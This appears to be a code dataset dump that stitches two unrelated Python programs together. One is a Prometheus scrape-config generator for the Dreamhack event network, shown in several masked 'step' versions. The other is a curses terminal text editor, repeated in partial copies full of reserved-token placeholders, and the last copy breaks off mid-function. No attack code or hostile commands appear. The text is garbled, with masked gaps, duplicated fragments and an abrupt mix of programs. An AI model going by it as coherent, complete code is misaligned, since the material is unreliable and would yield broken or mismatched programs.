"step-2": "<mask token>\n\n\ndef blackbox(name, backend, targets, params, target='target', path='/probe',\n labels=None):\n labels = {} if labels is None else labels\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {'job_name': name, 'metrics_path': path, 'params': params,\n 'static_configs': [{'targets': sorted(filtered_targets), 'labels':\n labels}], 'relabel_configs': [{'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?', 'target_label': '__param_%s' % target,\n 'replacement': '${1}'}, {'source_labels': ['__param_%s' % target],\n 'regex': '(.*)', 'target_label': 'instance', 'replacement': '${1}'},\n {'source_labels': [], 'regex': '.*', 'target_label': '__address__',\n 'replacement': backend}]}\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n basic_auth = lib.read_secret('services/monitoring:login')\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n urls = spec['monitor']['url'] if isinstance(spec['monitor']['url'],\n dict) else {None: spec['monitor']['url']}\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(lib.get_nodes_with_package(package, domain\n ).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {'job_name': package + ('-%s' % url_id if\n url_id else ''), 'metrics_path': url.path, 'scheme': url.\n scheme, 'static_configs': [{'targets': sorted(targets)}]}\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor'][\n 'labels']\n if spec['monitor'].get('auth', False) and url.scheme == 'https':\n scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n layers = lib.get_layers(domain)\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [(x + ':22') for x in set(hosts) - set(ssh_mute)]\n for layer in layers:\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox('snmp_%s' % layer, snmp_host, snmp_nodes[layer], {\n 'layer': [layer]}, labels={'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox('ssh_%s_%s' % (layer, ssh_host), fqdn, ssh_nodes\n [layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n external = {'job_name': 'external', 'file_sd_configs': [{'files': [\n '/etc/prometheus/external/*.yaml']}]}\n scrape_configs.append(external)\n if host.endswith('.event.dreamhack.se'):\n puppet = {'job_name': 'puppet_runs', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s',\n 'static_configs': [{'targets': ['puppet.tech.dreamhack.se:9100']}]}\n scrape_configs.append(puppet)\n vcenter = {'job_name': 'vmware_vcenter', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s', 'static_configs':\n [{'targets': ['provision.event.dreamhack.se:9272']}]}\n scrape_configs.append(vcenter)\n relabel = {'regex': ':?([^:]*):?.*', 'separator': ':', 'replacement':\n '${1}', 'source_labels': ['host', 'instance'], 'target_label': 'host'}\n mrc = 'metric_relabel_configs'\n for scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\ndef requires(host, *args):\n return ['apache(ldap)']\n\n\ndef generate(host, *args):\n info = {}\n local_targets = []\n local_targets.append({'job_name': 'prometheus', 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n info['prometheus']['current_event'] = lib.get_current_event()\n return info\n",
"step-3": "<mask token>\nMANIFEST_PATH = '/etc/manifest'\nHTTP_BASIC_AUTH = None\n\n\ndef blackbox(name, backend, targets, params, target='target', path='/probe',\n labels=None):\n labels = {} if labels is None else labels\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {'job_name': name, 'metrics_path': path, 'params': params,\n 'static_configs': [{'targets': sorted(filtered_targets), 'labels':\n labels}], 'relabel_configs': [{'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?', 'target_label': '__param_%s' % target,\n 'replacement': '${1}'}, {'source_labels': ['__param_%s' % target],\n 'regex': '(.*)', 'target_label': 'instance', 'replacement': '${1}'},\n {'source_labels': [], 'regex': '.*', 'target_label': '__address__',\n 'replacement': backend}]}\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n basic_auth = lib.read_secret('services/monitoring:login')\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n urls = spec['monitor']['url'] if isinstance(spec['monitor']['url'],\n dict) else {None: spec['monitor']['url']}\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(lib.get_nodes_with_package(package, domain\n ).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {'job_name': package + ('-%s' % url_id if\n url_id else ''), 'metrics_path': url.path, 'scheme': url.\n scheme, 'static_configs': [{'targets': sorted(targets)}]}\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor'][\n 'labels']\n if spec['monitor'].get('auth', False) and url.scheme == 'https':\n scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n layers = lib.get_layers(domain)\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [(x + ':22') for x in set(hosts) - set(ssh_mute)]\n for layer in layers:\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox('snmp_%s' % layer, snmp_host, snmp_nodes[layer], {\n 'layer': [layer]}, labels={'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox('ssh_%s_%s' % (layer, ssh_host), fqdn, ssh_nodes\n [layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n external = {'job_name': 'external', 'file_sd_configs': [{'files': [\n '/etc/prometheus/external/*.yaml']}]}\n scrape_configs.append(external)\n if host.endswith('.event.dreamhack.se'):\n puppet = {'job_name': 'puppet_runs', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s',\n 'static_configs': [{'targets': ['puppet.tech.dreamhack.se:9100']}]}\n scrape_configs.append(puppet)\n vcenter = {'job_name': 'vmware_vcenter', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s', 'static_configs':\n [{'targets': ['provision.event.dreamhack.se:9272']}]}\n scrape_configs.append(vcenter)\n relabel = {'regex': ':?([^:]*):?.*', 'separator': ':', 'replacement':\n '${1}', 'source_labels': ['host', 'instance'], 'target_label': 'host'}\n mrc = 'metric_relabel_configs'\n for scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\ndef requires(host, *args):\n return ['apache(ldap)']\n\n\ndef generate(host, *args):\n info = {}\n local_targets = []\n local_targets.append({'job_name': 'prometheus', 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n info['prometheus']['current_event'] = lib.get_current_event()\n return info\n",
"step-4": "import lib\nimport urlparse\nimport yaml\nMANIFEST_PATH = '/etc/manifest'\nHTTP_BASIC_AUTH = None\n\n\ndef blackbox(name, backend, targets, params, target='target', path='/probe',\n labels=None):\n labels = {} if labels is None else labels\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {'job_name': name, 'metrics_path': path, 'params': params,\n 'static_configs': [{'targets': sorted(filtered_targets), 'labels':\n labels}], 'relabel_configs': [{'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?', 'target_label': '__param_%s' % target,\n 'replacement': '${1}'}, {'source_labels': ['__param_%s' % target],\n 'regex': '(.*)', 'target_label': 'instance', 'replacement': '${1}'},\n {'source_labels': [], 'regex': '.*', 'target_label': '__address__',\n 'replacement': backend}]}\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n basic_auth = lib.read_secret('services/monitoring:login')\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n urls = spec['monitor']['url'] if isinstance(spec['monitor']['url'],\n dict) else {None: spec['monitor']['url']}\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(lib.get_nodes_with_package(package, domain\n ).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {'job_name': package + ('-%s' % url_id if\n url_id else ''), 'metrics_path': url.path, 'scheme': url.\n scheme, 'static_configs': [{'targets': sorted(targets)}]}\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor'][\n 'labels']\n if spec['monitor'].get('auth', False) and url.scheme == 'https':\n scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n layers = lib.get_layers(domain)\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [(x + ':22') for x in set(hosts) - set(ssh_mute)]\n for layer in layers:\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox('snmp_%s' % layer, snmp_host, snmp_nodes[layer], {\n 'layer': [layer]}, labels={'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox('ssh_%s_%s' % (layer, ssh_host), fqdn, ssh_nodes\n [layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n external = {'job_name': 'external', 'file_sd_configs': [{'files': [\n '/etc/prometheus/external/*.yaml']}]}\n scrape_configs.append(external)\n if host.endswith('.event.dreamhack.se'):\n puppet = {'job_name': 'puppet_runs', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s',\n 'static_configs': [{'targets': ['puppet.tech.dreamhack.se:9100']}]}\n scrape_configs.append(puppet)\n vcenter = {'job_name': 'vmware_vcenter', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s', 'static_configs':\n [{'targets': ['provision.event.dreamhack.se:9272']}]}\n scrape_configs.append(vcenter)\n relabel = {'regex': ':?([^:]*):?.*', 'separator': ':', 'replacement':\n '${1}', 'source_labels': ['host', 'instance'], 'target_label': 'host'}\n mrc = 'metric_relabel_configs'\n for scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\ndef requires(host, *args):\n return ['apache(ldap)']\n\n\ndef generate(host, *args):\n info = {}\n local_targets = []\n local_targets.append({'job_name': 'prometheus', 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n info['prometheus']['current_event'] = lib.get_current_event()\n return info\n",
"step-5": "# Copyright 2018 dhtech\n#\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file\nimport lib\nimport urlparse\nimport yaml\n\n\nMANIFEST_PATH = '/etc/manifest'\nHTTP_BASIC_AUTH = None\n\n\ndef blackbox(name, backend, targets, params,\n target='target', path='/probe', labels=None):\n labels = {} if labels is None else labels\n # Strip banned OSes\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {\n 'job_name': name,\n 'metrics_path': path,\n 'params': params,\n 'static_configs': [{\n 'targets': sorted(filtered_targets),\n 'labels': labels\n }],\n 'relabel_configs': [{\n 'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?',\n 'target_label': '__param_%s' % target,\n 'replacement': '${1}',\n }, {\n 'source_labels': ['__param_%s' % target],\n 'regex': '(.*)',\n 'target_label': 'instance',\n 'replacement': '${1}',\n }, {\n 'source_labels': [],\n 'regex': '.*',\n 'target_label': '__address__',\n 'replacement': backend,\n }]\n }\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n\n basic_auth = lib.read_secret('services/monitoring:login')\n\n # Find services that wants to be monitored\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n\n urls = (spec['monitor']['url']\n if isinstance(spec['monitor']['url'], dict) else\n {None: spec['monitor']['url']})\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(\n lib.get_nodes_with_package(package, domain).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {\n 'job_name': package + ('-%s' % url_id if url_id else ''),\n 'metrics_path': url.path,\n 'scheme': url.scheme,\n 'static_configs': [\n {'targets': sorted(targets)}\n ],\n }\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor']['labels']\n # Only allow authentication over https\n if spec['monitor'].get('auth', False) and url.scheme == 'https':\n scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n\n # Layer specific monitoring\n layers = lib.get_layers(domain)\n\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [x+':22' for x in set(hosts) - set(ssh_mute)]\n\n # SNMP\n for layer in layers:\n # TODO(bluecmd): Use options for this\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox(\n 'snmp_%s' % layer, snmp_host,\n snmp_nodes[layer], {'layer': [layer]}, labels={\n 'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n\n # SSH\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox(\n 'ssh_%s_%s' % (layer, ssh_host), fqdn,\n ssh_nodes[layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n\n # Add external service-discovery\n external = {\n 'job_name': 'external',\n 'file_sd_configs': [{\n 'files': ['/etc/prometheus/external/*.yaml'],\n }],\n }\n scrape_configs.append(external)\n\n if host.endswith('.event.dreamhack.se'):\n # Event should scrape puppet.tech.dreamhack.se to get information about\n # puppet runs\n puppet = {\n 'job_name': 'puppet_runs',\n 'metrics_path': '/metrics',\n 'scrape_interval': '60s',\n 'scrape_timeout': '55s',\n 'static_configs': [{\n 'targets': ['puppet.tech.dreamhack.se:9100'],\n }],\n }\n scrape_configs.append(puppet)\n\n vcenter = {\n 'job_name': 'vmware_vcenter',\n 'metrics_path': '/metrics',\n 'scrape_interval': '60s',\n 'scrape_timeout': '55s',\n 'static_configs': [{\n 'targets': ['provision.event.dreamhack.se:9272'],\n }],\n }\n scrape_configs.append(vcenter)\n\n # Make sure that all metrics have a host label.\n # This rule uses the existing host label if there is one,\n # stripping of the port (which shouldn't be part of the host label anyway)\n # *or* if that label does not exist it uses the instance label\n # (again stripping of the port)\n relabel = {\n 'regex': r':?([^:]*):?.*',\n 'separator': ':',\n 'replacement': '${1}',\n 'source_labels': ['host', 'instance'],\n 'target_label': 'host',\n }\n\n mrc = 'metric_relabel_configs'\n for scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\ndef requires(host, *args):\n return ['apache(ldap)']\n\n\ndef generate(host, *args):\n\n info = {}\n\n local_targets = []\n local_targets.append({\n 'job_name': 'prometheus',\n 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n\n # Get current event\n info['prometheus']['current_event'] = lib.get_current_event()\n\n return info\n\n# vim: ts=4: sts=4: sw=4: expandtab\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def main(screen, file_path):
setUpEnv()
text = readFileIfExist(file_path)
while 1:
try:
text = startEditing(screen, text)
printQuitOptions(screen)
char = screen.getch()
if char == KEY_ENTER_CODE:
writeToFile(file_path, text)
return 3, None
elif char == KEY_F9:
return 2, None
else:
pass
except KeyboardInterrupt:
return 1, None
except:
error_msg = traceback.format_exc()
return -1, error_msg
def setUpEnv():
use_default_colors()
init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
cursor = Cursor(screen, BORDER_COLOR, text)
while 1:
char = screen.getch()
if char == KEY_F1:
break
elif char == TERMINAL_RESIZE_CODE:
cursor.resizeTextBox()
elif char == KEY_RIGHT:
cursor.moveRight()
elif char == KEY_LEFT:
cursor.moveLeft()
elif char == KEY_UP:
cursor.moveUp()
elif char == KEY_DOWN:
cursor.moveDown()
elif 31 < char < 127:
cursor.writeChar(char)
elif char == KEY_DELETE_CODE:
cursor.delete()
elif char == 10 or char == 13 or char == KEY_ENTER:
cursor.newLine()
elif char == KEY_TAB_CODE:
cursor.tab()
elif char == KEY_ESCAPE_CODE:
char = screen.getch()
if char == KEY_LEFT or char == 98:
cursor.moveToLeftMost()
elif char == KEY_RIGHT or char == 102:
cursor.moveToRightMost()
elif char == KEY_DELETE_CODE:
cursor.deleteWholeLine()
elif char == KEY_DOWN:
cursor.moveToRightBottomMost()
elif char == KEY_UP:
cursor.moveToRightUpMost()
else:
ungetch(char)
else:
cursor._writeString(str(char))
return cursor.getText()
def printQuitOptions(screen):
height, width = screen.getmaxyx()
screen.clear()
y = int(height / 2.5)
x = int(width / 2.5)
screen.addstr(y, x, 'Quit and Save (ENTER)')
screen.addstr(y + 1, x, 'Quit (F9)')
screen.addstr(y + 2, x, 'Go Back (Any Key)')
screen.refresh()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(screen, file_path):
setUpEnv()
text = readFileIfExist(file_path)
while 1:
try:
text = startEditing(screen, text)
printQuitOptions(screen)
char = screen.getch()
if char == KEY_ENTER_CODE:
writeToFile(file_path, text)
return 3, None
elif char == KEY_F9:
return 2, None
else:
pass
except KeyboardInterrupt:
return 1, None
except:
error_msg = traceback.format_exc()
return -1, error_msg
def setUpEnv():
use_default_colors()
init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
cursor = Cursor(screen, BORDER_COLOR, text)
while 1:
char = screen.getch()
if char == KEY_F1:
break
elif char == TERMINAL_RESIZE_CODE:
cursor.resizeTextBox()
elif char == KEY_RIGHT:
cursor.moveRight()
elif char == KEY_LEFT:
cursor.moveLeft()
elif char == KEY_UP:
cursor.moveUp()
elif char == KEY_DOWN:
cursor.moveDown()
elif 31 < char < 127:
cursor.writeChar(char)
elif char == KEY_DELETE_CODE:
cursor.delete()
elif char == 10 or char == 13 or char == KEY_ENTER:
cursor.newLine()
elif char == KEY_TAB_CODE:
cursor.tab()
elif char == KEY_ESCAPE_CODE:
char = screen.getch()
if char == KEY_LEFT or char == 98:
cursor.moveToLeftMost()
elif char == KEY_RIGHT or char == 102:
cursor.moveToRightMost()
elif char == KEY_DELETE_CODE:
cursor.deleteWholeLine()
elif char == KEY_DOWN:
cursor.moveToRightBottomMost()
elif char == KEY_UP:
cursor.moveToRightUpMost()
else:
ungetch(char)
else:
cursor._writeString(str(char))
return cursor.getText()
def printQuitOptions(screen):
height, width = screen.getmaxyx()
screen.clear()
y = int(height / 2.5)
x = int(width / 2.5)
screen.addstr(y, x, 'Quit and Save (ENTER)')
screen.addstr(y + 1, x, 'Quit (F9)')
screen.addstr(y + 2, x, 'Go Back (Any Key)')
screen.refresh()
def printExitMessage(exit_code, error_msg):
if exit_code == -1:
printToTerminal('Shit just happen, sorry.')
if error_msg:
printToTerminal(error_msg)
elif exit_code == 1:
printToTerminal('Quit, safe and sound.')
elif exit_code == 2:
printToTerminal('Quit without save.')
elif exit_code == 3:
printToTerminal('saved !')
elif exit_code == 4:
printToTerminal(VERSION)
elif exit_code == 5:
printToTerminal(
'======================== Welcome to Simple Editor X ========================'
, 'GREEN')
printToTerminal('')
printToTerminal('Arguments:')
printToTerminal(' -version')
printToTerminal(' -help')
printToTerminal(
' {file_name}, to start editing an existing or create a new file'
)
printToTerminal('')
printToTerminal('While using:')
printToTerminal(' Press F1, then ENTER to save')
printToTerminal('')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(screen, file_path):
setUpEnv()
text = readFileIfExist(file_path)
while 1:
try:
text = startEditing(screen, text)
printQuitOptions(screen)
char = screen.getch()
if char == KEY_ENTER_CODE:
writeToFile(file_path, text)
return 3, None
elif char == KEY_F9:
return 2, None
else:
pass
except KeyboardInterrupt:
return 1, None
except:
error_msg = traceback.format_exc()
return -1, error_msg
def setUpEnv():
use_default_colors()
init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
cursor = Cursor(screen, BORDER_COLOR, text)
while 1:
char = screen.getch()
if char == KEY_F1:
break
elif char == TERMINAL_RESIZE_CODE:
cursor.resizeTextBox()
elif char == KEY_RIGHT:
cursor.moveRight()
elif char == KEY_LEFT:
cursor.moveLeft()
elif char == KEY_UP:
cursor.moveUp()
elif char == KEY_DOWN:
cursor.moveDown()
elif 31 < char < 127:
cursor.writeChar(char)
elif char == KEY_DELETE_CODE:
cursor.delete()
elif char == 10 or char == 13 or char == KEY_ENTER:
cursor.newLine()
elif char == KEY_TAB_CODE:
cursor.tab()
elif char == KEY_ESCAPE_CODE:
char = screen.getch()
if char == KEY_LEFT or char == 98:
cursor.moveToLeftMost()
elif char == KEY_RIGHT or char == 102:
cursor.moveToRightMost()
elif char == KEY_DELETE_CODE:
cursor.deleteWholeLine()
elif char == KEY_DOWN:
cursor.moveToRightBottomMost()
elif char == KEY_UP:
cursor.moveToRightUpMost()
else:
ungetch(char)
else:
cursor._writeString(str(char))
return cursor.getText()
def printQuitOptions(screen):
height, width = screen.getmaxyx()
screen.clear()
y = int(height / 2.5)
x = int(width / 2.5)
screen.addstr(y, x, 'Quit and Save (ENTER)')
screen.addstr(y + 1, x, 'Quit (F9)')
screen.addstr(y + 2, x, 'Go Back (Any Key)')
screen.refresh()
def printExitMessage(exit_code, error_msg):
if exit_code == -1:
printToTerminal('Shit just happen, sorry.')
if error_msg:
printToTerminal(error_msg)
elif exit_code == 1:
printToTerminal('Quit, safe and sound.')
elif exit_code == 2:
printToTerminal('Quit without save.')
elif exit_code == 3:
printToTerminal('saved !')
elif exit_code == 4:
printToTerminal(VERSION)
elif exit_code == 5:
printToTerminal(
'======================== Welcome to Simple Editor X ========================'
, 'GREEN')
printToTerminal('')
printToTerminal('Arguments:')
printToTerminal(' -version')
printToTerminal(' -help')
printToTerminal(
' {file_name}, to start editing an existing or create a new file'
)
printToTerminal('')
printToTerminal('While using:')
printToTerminal(' Press F1, then ENTER to save')
printToTerminal('')
if __name__ == '__main__':
if len(sys.argv) != 2:
printToTerminal('This application take exactly 1 argument')
printToTerminal("type: 'sex -help' for more details")
exit(69)
error_msg = ''
exit_code = -1
arg = sys.argv[1].lower()
file_path = sys.argv[1]
if arg == '-v' or arg == '-version':
exit_code = 4
elif arg == '-h' or arg == '-help':
exit_code = 5
else:
exit_code, error_msg = wrapper(main, file_path)
printExitMessage(exit_code, error_msg)
<|reserved_special_token_1|>
import sys
import os
import traceback
from src.properties import *
from src.utils import *
from subprocess import call
from src.entity.cursor import Cursor
from curses import *
def main(screen, file_path):
setUpEnv()
text = readFileIfExist(file_path)
while 1:
try:
text = startEditing(screen, text)
printQuitOptions(screen)
char = screen.getch()
if char == KEY_ENTER_CODE:
writeToFile(file_path, text)
return 3, None
elif char == KEY_F9:
return 2, None
else:
pass
except KeyboardInterrupt:
return 1, None
except:
error_msg = traceback.format_exc()
return -1, error_msg
def setUpEnv():
use_default_colors()
init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
cursor = Cursor(screen, BORDER_COLOR, text)
while 1:
char = screen.getch()
if char == KEY_F1:
break
elif char == TERMINAL_RESIZE_CODE:
cursor.resizeTextBox()
elif char == KEY_RIGHT:
cursor.moveRight()
elif char == KEY_LEFT:
cursor.moveLeft()
elif char == KEY_UP:
cursor.moveUp()
elif char == KEY_DOWN:
cursor.moveDown()
elif 31 < char < 127:
cursor.writeChar(char)
elif char == KEY_DELETE_CODE:
cursor.delete()
elif char == 10 or char == 13 or char == KEY_ENTER:
cursor.newLine()
elif char == KEY_TAB_CODE:
cursor.tab()
elif char == KEY_ESCAPE_CODE:
char = screen.getch()
if char == KEY_LEFT or char == 98:
cursor.moveToLeftMost()
elif char == KEY_RIGHT or char == 102:
cursor.moveToRightMost()
elif char == KEY_DELETE_CODE:
cursor.deleteWholeLine()
elif char == KEY_DOWN:
cursor.moveToRightBottomMost()
elif char == KEY_UP:
cursor.moveToRightUpMost()
else:
ungetch(char)
else:
cursor._writeString(str(char))
return cursor.getText()
def printQuitOptions(screen):
height, width = screen.getmaxyx()
screen.clear()
y = int(height / 2.5)
x = int(width / 2.5)
screen.addstr(y, x, 'Quit and Save (ENTER)')
screen.addstr(y + 1, x, 'Quit (F9)')
screen.addstr(y + 2, x, 'Go Back (Any Key)')
screen.refresh()
def printExitMessage(exit_code, error_msg):
if exit_code == -1:
printToTerminal('Shit just happen, sorry.')
if error_msg:
printToTerminal(error_msg)
elif exit_code == 1:
printToTerminal('Quit, safe and sound.')
elif exit_code == 2:
printToTerminal('Quit without save.')
elif exit_code == 3:
printToTerminal('saved !')
elif exit_code == 4:
printToTerminal(VERSION)
elif exit_code == 5:
printToTerminal(
'======================== Welcome to Simple Editor X ========================'
, 'GREEN')
printToTerminal('')
printToTerminal('Arguments:')
printToTerminal(' -version')
printToTerminal(' -help')
printToTerminal(
' {file_name}, to start editing an existing or create a new file'
)
printToTerminal('')
printToTerminal('While using:')
printToTerminal(' Press F1, then ENTER to save')
printToTerminal('')
if __name__ == '__main__':
if len(sys.argv) != 2:
printToTerminal('This application take exactly 1 argument')
printToTerminal("type: 'sex -help' for more details")
exit(69)
error_msg = ''
exit_code = -1
arg = sys.argv[1].lower()
file_path = sys.argv[1]
if arg == '-v' or arg == '-version':
exit_code = 4
elif arg == '-h' or arg == '-help':
exit_code = 5
else:
exit_code, error_msg = wrapper(main, file_path)
printExitMessage(exit_code, error_msg)
<|reserved_special_token_1|>
import sys
import os
import traceback
from src.properties import *
from src.utils import *
from subprocess import call
from src.entity.cursor import Cursor
from curses import *
def main(screen, file_path):
setUpEnv()
text = readFileIfExist(file_path)
while 1:
try:
text = startEditing(screen, text)
printQuitOptions(screen)
char = screen.getch()
if char == KEY_ENTER_CODE:
writeToFile(file_path, text)
return 3, None
elif char == KEY_F9:
return 2, None
else:
pass
except KeyboardInterrupt: # quit properly, when user press Ctrl + C
return 1, None
except:
error_msg = traceback.format_exc()
return -1, error_msg
def setUpEnv():
use_default_colors()
